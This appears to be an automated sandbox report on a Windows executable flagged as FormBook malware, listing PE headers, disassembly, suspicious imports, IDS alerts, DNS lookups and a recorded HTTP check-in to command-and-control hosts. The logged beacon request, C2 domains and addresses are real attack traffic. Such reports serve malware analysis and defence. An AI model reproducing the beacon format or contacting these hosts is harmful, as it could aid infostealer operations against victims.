File Icon


Icon Hash:	1733312925935517

Static PE Info

General

Entrypoint:	0x4165c1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	369fe35b86c83b3130c02698158a4d4d

Entrypoint Preview

Instruction
call 00007F19008440DBh
jmp 00007F190083AF4Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F190083B0CAh
cmp edi, eax
jc 00007F190083B266h
cmp ecx, 00000080h
jc 00007F190083B0DEh
cmp dword ptr [004A9724h], 00000000h
je 00007F190083B0D5h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007F190083B0C7h
jmp 00007F190083B4A2h
test edi, 00000003h
jne 00007F190083B0D6h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007F190083B0EBh
rep movsd
jmp dword ptr [00416740h+edx*4]
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007F190083B0CEh
and eax, 03h
add ecx, eax
jmp dword ptr [00416654h+eax*4]
jmp dword ptr [00416750h+ecx*4]
nop
jmp dword ptr [004166D4h+ecx*4]
nop
inc cx
add byte ptr [eax-4BFFBE9Ah], dl
inc cx
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007F1902CB38C7h
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007F190083B08Eh
rep movsd
jmp dword ptr [00000000h+edx*4]

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[C++] VS2010 SP1 build 40219
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8d41c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xab000	0x9328	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8061c	0x80800	61ffce4768976fa0dd2a8f6a97b1417a	False	0.5583182605787937	data	6.684690148171278	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x82000	0xdfc0	0xe000	f0991b788ac34ea4b210673093655317	False	0.3256312779017857	data	4.484090180677536	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x90000	0x1a758	0x6800	8033f5a38941b4685bc2299e78f31221	False	0.15324519230769232	data	2.1500715391677487	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xab000	0x9328	0x9400	2c856ae1256931ca4a68d9d8ffe94661	False	0.4900760135135135	data	5.5412345511514465	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xab5c8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xab6f0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xab818	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xab940	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	Great Britain	0.48109756097560974
RT_ICON	0xabfa8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	Great Britain	0.5672043010752689
RT_ICON	0xac290	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	Great Britain	0.6418918918918919
RT_ICON	0xac3b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	Great Britain	0.7044243070362474
RT_ICON	0xad260	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	Great Britain	0.8077617328519856
RT_ICON	0xadb08	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	Great Britain	0.5903179190751445
RT_ICON	0xae070	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	Great Britain	0.5503112033195021
RT_ICON	0xb0618	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	Great Britain	0.6050656660412758
RT_ICON	0xb16c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.7553191489361702
RT_MENU	0xb1b28	0x50	data	English	Great Britain	0.9
RT_DIALOG	0xb1b78	0xfc	data	English	Great Britain	0.6507936507936508
RT_STRING	0xb1c78	0x530	data	English	Great Britain	0.33960843373493976
RT_STRING	0xb21a8	0x690	data	English	Great Britain	0.26964285714285713
RT_STRING	0xb2838	0x4d0	data	English	Great Britain	0.36363636363636365
RT_STRING	0xb2d08	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xb3308	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xb3968	0x388	data	English	Great Britain	0.377212389380531
RT_STRING	0xb3cf0	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.502906976744186
RT_GROUP_ICON	0xb3e48	0x84	data	English	Great Britain	0.6439393939393939
RT_GROUP_ICON	0xb3ed0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xb3ee8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xb3f00	0x14	data	English	Great Britain	1.25
RT_VERSION	0xb3f18	0x19c	data	English	Great Britain	0.5339805825242718
RT_MANIFEST	0xb40b8	0x26c	ASCII text, with CRLF line terminators	English	United States	0.5145161290322581

Imports

DLL	Import
KERNEL32.DLL	HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
ADVAPI32.dll	RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
COMCTL32.dll	ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
GDI32.dll	DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
MPR.dll	WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
ole32.dll	OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll	VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
PSAPI.DLL	EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
SHELL32.dll	DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
USER32.dll	GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
USERENV.dll	CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
VERSION.dll	VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
WSOCK32.dll	__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T15:44:07.976740+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49974	198.44.251.203	80	TCP
2024-10-08T15:45:37.631608+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49970	84.32.84.32	80	TCP
2024-10-08T15:45:54.852327+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49971	198.44.251.203	80	TCP
2024-10-08T15:45:57.399175+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49972	198.44.251.203	80	TCP
2024-10-08T15:45:59.977238+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49973	198.44.251.203	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 15:45:37.145447016 CEST	49970	80	192.168.2.7	84.32.84.32
Oct 8, 2024 15:45:37.150533915 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.150768995 CEST	49970	80	192.168.2.7	84.32.84.32
Oct 8, 2024 15:45:37.158478022 CEST	49970	80	192.168.2.7	84.32.84.32
Oct 8, 2024 15:45:37.163475990 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.630897999 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.631547928 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.631556988 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.631608009 CEST	49970	80	192.168.2.7	84.32.84.32
Oct 8, 2024 15:45:37.633117914 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.633128881 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.633255959 CEST	49970	80	192.168.2.7	84.32.84.32
Oct 8, 2024 15:45:37.634542942 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.634555101 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.634598970 CEST	49970	80	192.168.2.7	84.32.84.32
Oct 8, 2024 15:45:37.635994911 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.636006117 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.636014938 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:37.636054993 CEST	49970	80	192.168.2.7	84.32.84.32
Oct 8, 2024 15:45:37.636087894 CEST	49970	80	192.168.2.7	84.32.84.32
Oct 8, 2024 15:45:37.699570894 CEST	49970	80	192.168.2.7	84.32.84.32
Oct 8, 2024 15:45:37.704513073 CEST	80	49970	84.32.84.32	192.168.2.7
Oct 8, 2024 15:45:53.328675032 CEST	49971	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:45:53.333714962 CEST	80	49971	198.44.251.203	192.168.2.7
Oct 8, 2024 15:45:53.333842993 CEST	49971	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:45:53.345212936 CEST	49971	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:45:53.350131989 CEST	80	49971	198.44.251.203	192.168.2.7
Oct 8, 2024 15:45:54.852327108 CEST	49971	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:45:54.899885893 CEST	80	49971	198.44.251.203	192.168.2.7
Oct 8, 2024 15:45:55.871269941 CEST	49972	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:45:55.876193047 CEST	80	49972	198.44.251.203	192.168.2.7
Oct 8, 2024 15:45:55.876271963 CEST	49972	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:45:55.887814045 CEST	49972	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:45:55.892756939 CEST	80	49972	198.44.251.203	192.168.2.7
Oct 8, 2024 15:45:57.399174929 CEST	49972	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:45:57.451844931 CEST	80	49972	198.44.251.203	192.168.2.7
Oct 8, 2024 15:45:58.439553976 CEST	49973	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:45:58.444694042 CEST	80	49973	198.44.251.203	192.168.2.7
Oct 8, 2024 15:45:58.444761992 CEST	49973	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:45:58.471081018 CEST	49973	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:45:58.477372885 CEST	80	49973	198.44.251.203	192.168.2.7
Oct 8, 2024 15:45:58.477407932 CEST	80	49973	198.44.251.203	192.168.2.7
Oct 8, 2024 15:45:59.977237940 CEST	49973	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:46:00.279649019 CEST	80	49973	198.44.251.203	192.168.2.7
Oct 8, 2024 15:46:01.065810919 CEST	49974	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:46:01.071067095 CEST	80	49974	198.44.251.203	192.168.2.7
Oct 8, 2024 15:46:01.071204901 CEST	49974	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:46:01.108316898 CEST	49974	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:46:01.113451958 CEST	80	49974	198.44.251.203	192.168.2.7
Oct 8, 2024 15:46:14.691507101 CEST	80	49971	198.44.251.203	192.168.2.7
Oct 8, 2024 15:46:14.691728115 CEST	49971	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:46:17.266608953 CEST	80	49972	198.44.251.203	192.168.2.7
Oct 8, 2024 15:46:17.266758919 CEST	49972	80	192.168.2.7	198.44.251.203
Oct 8, 2024 15:46:19.831867933 CEST	80	49973	198.44.251.203	192.168.2.7
Oct 8, 2024 15:46:19.835880041 CEST	49973	80	192.168.2.7	198.44.251.203

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 15:45:31.479403019 CEST	52936	53	192.168.2.7	1.1.1.1
Oct 8, 2024 15:45:31.488852024 CEST	53	52936	1.1.1.1	192.168.2.7
Oct 8, 2024 15:45:36.496467113 CEST	52891	53	192.168.2.7	1.1.1.1
Oct 8, 2024 15:45:37.138461113 CEST	53	52891	1.1.1.1	192.168.2.7
Oct 8, 2024 15:45:52.775178909 CEST	50522	53	192.168.2.7	1.1.1.1
Oct 8, 2024 15:45:53.325781107 CEST	53	50522	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 15:45:31.479403019 CEST	192.168.2.7	1.1.1.1	0xcbc5	Standard query (0)	www.timetime.store	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:45:36.496467113 CEST	192.168.2.7	1.1.1.1	0x79e5	Standard query (0)	www.servehimfoundation.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:45:52.775178909 CEST	192.168.2.7	1.1.1.1	0x4d28	Standard query (0)	www.n0pme6.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 15:45:31.488852024 CEST	1.1.1.1	192.168.2.7	0xcbc5	Name error (3)	www.timetime.store	none	none	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:45:37.138461113 CEST	1.1.1.1	192.168.2.7	0x79e5	No error (0)	www.servehimfoundation.org	servehimfoundation.org		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 15:45:37.138461113 CEST	1.1.1.1	192.168.2.7	0x79e5	No error (0)	servehimfoundation.org		84.32.84.32	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:45:53.325781107 CEST	1.1.1.1	192.168.2.7	0x4d28	No error (0)	www.n0pme6.top		198.44.251.203	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:45:53.325781107 CEST	1.1.1.1	192.168.2.7	0x4d28	No error (0)	www.n0pme6.top		198.44.251.51	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.servehimfoundation.org

www.n0pme6.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49970	84.32.84.32	80	6824	C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:45:37.158478022 CEST	532	OUT	GET /wlo5/?FBeh=CM5svj/Jqf1poSHeMj5/r+NnqEfLZZItIQ95L2yXLG/JG/00oonc4yb62CzIQH5xpFXAP6Ke6nqsuzHIo+F+y7v4YQSe8tbNC1hB8RVd0xhKZiYo2oKcfdFxxvEt5bq2V2swyTcdbe6T&DfhDq=hvZ8HhLP1L HTTP/1.1 Host: www.servehimfoundation.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Oct 8, 2024 15:45:37.630897999 CEST	1236	IN	HTTP/1.1 200 OK Server: hcdn Date: Tue, 08 Oct 2024 13:45:37 GMT Content-Type: text/html Content-Length: 10072 Connection: close Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 5fc10a0b0f8f7885a6e2c92bcf9ffda1-bos-edge1 Expires: Tue, 08 Oct 2024 13:45:36 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
